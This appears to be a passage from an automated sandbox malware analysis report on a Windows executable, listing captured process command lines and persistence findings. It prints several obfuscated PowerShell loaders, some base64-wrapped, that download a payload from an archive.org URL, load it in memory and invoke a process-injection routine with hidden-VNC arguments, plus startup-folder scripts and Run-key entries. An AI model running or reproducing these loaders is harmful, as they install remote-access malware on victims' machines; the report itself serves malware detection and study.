Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnTnJYdXJsJysnID0nKycgWicrJ0hvJysnaHQnKyd0cHM6Ly8nKydpYTYwMCcrJzEwJysnMC51cy5hcmNoJysnaXYnKydlLicrJ29yZy8yNC8nKydpdCcrJ2Vtcy9kZXRhJysnaC1uJysnb3RlLXYvRCcrJ2UnKyd0YWhOb3RlVicrJy50eCcrJ3RaSG87TnJYJysnYmEnKydzZTY0Q29udGVuJysndCA9IChOZXctT2JqZWN0IFN5c3RlbS4nKydOZXQuV2ViQycrJ2xpZScrJ250KS5Eb3dubG9hZCcrJ1N0cmluZyhOclh1cmwnKycpO05yJysnWCcrJ2JpJysnbicrJ2FyJysneUNvbnRlbicrJ3QgPScrJyBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZScrJzY0UycrJ3RyJysnaW4nKydnKE5yWGJhcycrJ2U2NEMnKydvbicrJ3RlbicrJ3QpO05yWGFzc2VtYmx5ID0gJysnW1JlZmxlYycrJ3Rpb24uJysnQScrJ3NzZW1ibHldOicrJzpMJysnb2FkKCcrJ05yJysnWGJpbmFyJysneUMnKydvbnQnKydlbnQpJysnOycrJ05yWCcrJ3R5cCcrJ2UnKycgPScrJyBOclhhc3NlbWJsJysneS5HZXRUeXBlKFpIbycrJ1J1blBFLkhvbWVaSG8pO05yWCcrJ20nKydldGhvZCA9ICcrJ04nKydyWHQnKyd5cGUuRycrJ2V0TScrJ2V0aG9kJysnKFpIJysnb1ZBSVpIbyk7TicrJ3InKydYbWV0aCcrJ29kLicrJ0luJysndm9rZShOcicrJ1huJysndScrJ2xsLCBbb2JqZWN0W11dQChaSG8wL0U3TycrJzI4L2QvZWUuJysnZXRzYXAvLzpzcHR0aFpIJysnbyAsJysnICcrJ1pIbzFaSG8nKycgLCBaSG9DOk93R1BybycrJ2dyYW1EYScrJ3RhJysnTycrJ3dHWkgnKydvICwgWkhvaHZuY1onKydIbywnKydaJysnSG9zdicrJ2Nob3N0WkhvLFpIb1pIbyknKycpJykgLWNyZXBMYWNlICAoW2NoQVJdOTArW2NoQVJdNzIrW2NoQVJdMTExKSxbY2hBUl0zOS1yZVBsQUNlJ093RycsW2NoQVJdOTItcmVQbEFDZSAoW2NoQVJdNzgrW2NoQVJdMTE0K1tjaEFSXTg4KSxbY2hBUl0zNil8aW52T0tlLWV4UFJlU1NpT04=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('NrXurl'+' ='+' Z'+'Ho'+'ht'+'tps://'+'ia600'+'10'+'0.us.arch'+'iv'+'e.'+'org/24/'+'it'+'ems/deta'+'h-n'+'ote-v/D'+'e'+'tahNoteV'+'.tx'+'tZHo;NrX'+'ba'+'se64Conten'+'t = (New-Object System.'+'Net.WebC'+'lie'+'nt).Download'+'String(NrXurl'+');Nr'+'X'+'bi'+'n'+'ar'+'yConten'+'t ='+' [System.Convert]::FromBase'+'64S'+'tr'+'in'+'g(NrXbas'+'e64C'+'on'+'ten'+'t);NrXassembly = '+'[Reflec'+'tion.'+'A'+'ssembly]:'+':L'+'oad('+'Nr'+'Xbinar'+'yC'+'ont'+'ent)'+';'+'NrX'+'typ'+'e'+' ='+' NrXassembl'+'y.GetType(ZHo'+'RunPE.HomeZHo);NrX'+'m'+'ethod = '+'N'+'rXt'+'ype.G'+'etM'+'ethod'+'(ZH'+'oVAIZHo);N'+'r'+'Xmeth'+'od.'+'In'+'voke(Nr'+'Xn'+'u'+'ll, [object[]]@(ZHo0/E7O'+'28/d/ee.'+'etsap//:sptthZH'+'o ,'+' '+'ZHo1ZHo'+' , ZHoC:OwGPro'+'gramDa'+'ta'+'O'+'wGZH'+'o , ZHohvncZ'+'Ho,'+'Z'+'Hosv'+'chostZHo,ZHoZHo)'+')') -crepLace ([chAR]90+[chAR]72+[chAR]111),[chAR]39-rePlACe'OwG',[chAR]92-rePlACe ([chAR]78+[chAR]114+[chAR]88),[chAR]36)|invOKe-exPReSSiON"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezB9dXJsID0gezF9aHR0cHMnKyc6Ly9pYTYwJysnMDEwMC51cy5hcmNoaScrJ3ZlLm9yZycrJy8yNC9pJysndGVtcycrJy9kJysnZXQnKydhJysnaC1ub3RlLXYvRGV0YWgnKydOb3RlVicrJy50eHR7MX07ezAnKyd9YmFzZTY0Q28nKydudGVudCAnKyc9JysnICcrJyhOZXctT2InKydqZWN0IFN5Jysnc3QnKydlbS5OZScrJ3QuVycrJ2ViQ2xpZScrJ250KS4nKydEb3dubCcrJ29hZFN0JysncmluJysnZyh7MCcrJ30nKyd1cmwpO3snKycwfWJpbicrJ2FyJysneUNvbicrJ3RlbicrJ3QgPScrJyAnKydbU3lzdGVtLkNvbnZlcnRdJysnOjonKydGcm9tQmEnKydzZTY0U3RyaW5nKHswfWJhc2UnKyc2NENvbicrJ3RlbnQpO3swfWFzc2UnKydtYmwnKyd5ICcrJz0nKycgW1JlZmxlY3Rpb24uQXMnKydzJysnZW1ibHldOjonKydMbycrJ2FkKHswfWJpbmEnKydyeUNvbnRlbnQpO3swfXR5cCcrJ2UgJysnPSB7JysnMH0nKydhc3NlbScrJ2JseS5HZXRUJysneXAnKydlKHsxfVInKyd1blBFJysnLkhvJysnbWV7JysnMX0pO3swJysnfScrJ21lJysndGhvZCA9IHswfXR5cGUuR2V0TWV0aG9kKHsxfVZBJysnSXsxfScrJyk7ezB9JysnbScrJ2UnKyd0aCcrJ29kLkluJysndicrJ29rZSh7MH1udScrJ2xsLCBbb2JqZScrJ2N0WycrJ11dJysnQCh7MX0nKycwJysnL2dKMWsnKydTJysnL2QvJysnZWUuZScrJ3RzYXAvLzpzcHR0aHsxJysnfScrJyAsJysnIHsxfWRlJysnc2F0JysnaXZhZG97MScrJ30nKycgLCB7MScrJ31kZXNhdGl2YScrJ2QnKydvezF9ICwgezF9JysnZGUnKydzYXRpdmFkb3snKycxfSx7MX1DJysnYScrJ3NQbycrJ2x7MX0nKycsezEnKyd9eycrJzF9KSknKS1mICBbY2hBUl0zNixbY2hBUl0zOSkgfElleA==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{0}url = {1}https'+'://ia60'+'0100.us.archi'+'ve.org'+'/24/i'+'tems'+'/d'+'et'+'a'+'h-note-v/Detah'+'NoteV'+'.txt{1};{0'+'}base64Co'+'ntent '+'='+' '+'(New-Ob'+'ject Sy'+'st'+'em.Ne'+'t.W'+'ebClie'+'nt).'+'Downl'+'oadSt'+'rin'+'g({0'+'}'+'url);{'+'0}bin'+'ar'+'yCon'+'ten'+'t ='+' '+'[System.Convert]'+'::'+'FromBa'+'se64String({0}base'+'64Con'+'tent);{0}asse'+'mbl'+'y '+'='+' [Reflection.As'+'s'+'embly]::'+'Lo'+'ad({0}bina'+'ryContent);{0}typ'+'e '+'= {'+'0}'+'assem'+'bly.GetT'+'yp'+'e({1}R'+'unPE'+'.Ho'+'me{'+'1});{0'+'}'+'me'+'thod = {0}type.GetMethod({1}VA'+'I{1}'+');{0}'+'m'+'e'+'th'+'od.In'+'v'+'oke({0}nu'+'ll, [obje'+'ct['+']]'+'@({1}'+'0'+'/gJ1k'+'S'+'/d/'+'ee.e'+'tsap//:sptth{1'+'}'+' ,'+' {1}de'+'sat'+'ivado{1'+'}'+' , {1'+'}desativa'+'d'+'o{1} , {1}'+'de'+'sativado{'+'1},{1}C'+'a'+'sPo'+'l{1}'+',{1'+'}{'+'1}))')-f [chAR]36,[chAR]39) |Iex"
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 18_2_00007FF7B38EA164 push ecx; iretd 18_2_00007FF7B38EA168

Persistence and Installation Behavior
barindex
Windows Shell Script Host drops VBS files
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs

Boot Survival
barindex
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\hvnc.vbs
Drops VBS files to the startup folder
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs Jump to dropped file
Drops script or batch files to the startup folder
Source: C:\Users\user\Desktop\TM3utH2CsU.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys.bat Jump to dropped file
Source: C:\Users\user\Desktop\TM3utH2CsU.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_pow.bat Jump to dropped file
Source: C:\Users\user\Desktop\TM3utH2CsU.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_32.bat Jump to dropped file
Creates a start menu entry (Start Menu\Programs\Startup)
Source: C:\Users\user\Desktop\TM3utH2CsU.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys.bat Jump to behavior
Stores files to the Windows start menu directory
Source: C:\Users\user\Desktop\TM3utH2CsU.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_sys.bat Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_pow.bat Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\start_32.bat Jump to behavior
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\escrivan.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path

Hooking and other Techniques for Hiding and Protection
barindex
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Source: initial sample Icon embedded in binary file: icon matches a legit application icon: download (98).png
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Users\user\Desktop\TM3utH2CsU.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
